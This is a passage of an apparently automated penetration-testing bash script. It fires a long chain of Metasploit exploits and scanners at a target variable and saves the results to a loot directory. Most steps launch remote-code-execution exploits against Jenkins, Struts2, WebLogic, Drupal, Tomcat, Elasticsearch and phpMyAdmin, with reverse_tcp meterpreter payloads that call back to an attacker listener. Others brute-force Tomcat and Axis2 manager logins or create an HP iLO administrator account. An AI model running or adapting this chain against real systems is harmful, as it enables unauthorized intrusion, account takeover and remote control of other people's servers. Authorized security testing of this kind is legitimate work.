msfconsole -q -x "use exploit/windows/http/manageengine_connectionid_write; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; set PAYLOAD windows/meterpreter/reverse_tcp; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT ENUMERATION $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use scanner/http/tomcat_enum; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT MANAGER LOGIN BRUTEFORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use auxiliary/scanner/http/tomcat_mgr_login; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING JENKINS ENUMERATION $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use scanner/http/jenkins_enum; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; set TARGETURI /; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING JENKINS SCRIPT CONSOLE RCE EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use multi/http/jenkins_script_console; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; setg SSL "$SSL"; set TARGET 0; run; set TARGETURI /; run; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set TARGET 1; run; set PAYLOAD linux/x86/meterpreter/reverse_tcp; run; set TARGET 2; set PAYLOAD linux/x64/meterpreter/reverse_tcp; run; set PAYLOAD linux/x86/meterpreter/reverse_tcp; run; set TARGETURI /; run; set TARGET 1; run; set TARGET 2; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING ELASTICSEARCH DYNAMIC SCRIPT JAVA INJECTION EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/elasticsearch/script_mvel_rce; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING DRUPALGEDDON HTTP PARAMETER SQL INJECTION CVE-2014-3704 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/http/drupal_drupageddon; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; setg URI /drupal/; setg TARGETURI /drupal/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw 2> /dev/null
|
||||
#echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
#echo -e "$OKRED RUNNING MS15-034 HTTP.SYS MEMORY LEAK EXPLOIT $RESET"
|
||||
#echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
#msfconsole -q -x "use scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw
|
||||
#sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.txt 2> /dev/null
|
||||
#rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING GLASSFISH ADMIN TRAVERSAL EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use scanner/http/glassfish_traversal; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOITS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg RHOST "$TARGET"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/htp/phpmyadmin_preg_replace; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING AXIS2 ADMIN BRUTE FORCE SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use scanner/http/axis_login; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg RHOST "$TARGET"; setg USERNAME admin; setg PASS_FILE "$PASS_FILE"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING AXIS2 AUTHENTICATED DEPLOYER RCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use multi/http/axis2_deployer; setg RHOSTS "$TARGET"; set FingerprintCheck false; setg RPORT "$PORT"; setg RHOST "$TARGET"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT CVE-2017-8917 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING WORDPRESS REST API CONTENT INJECTION CVE-2017-5612 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use auxiliary/scanner/http/wordpress_content_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING ORACLE WEBLOGIC WLS-WSAT DESERIALIZATION RCE CVE-2017-10271 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS JAKARTA OGNL INJECTION CVE-2017-5638 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use multi/http/struts2_content_type_ognl; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; set TARGETURI /orders/3; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 SHOWCASE OGNL RCE CVE-2017-9805 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/http/struts2_rest_xstream; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; set TARGETURI /orders/3; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 REST XSTREAM RCE CVE-2017-9791 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/http/struts2_code_exec_showcase; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; set TARGETURI /orders/3; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/http/tomcat_jsp_upload_bypass; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 NAMESPACE REDIRECT OGNL INJECTION CVE-2018-11776 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/http/struts2_namespace_ognl; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED CISCO ASA TRAVERSAL CVE-2018-0296 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use auxiliary/scanner/http/cisco_directory_traversal; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; setg URI /drupal/; setg TARGETURI /drupal/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw
|
||||
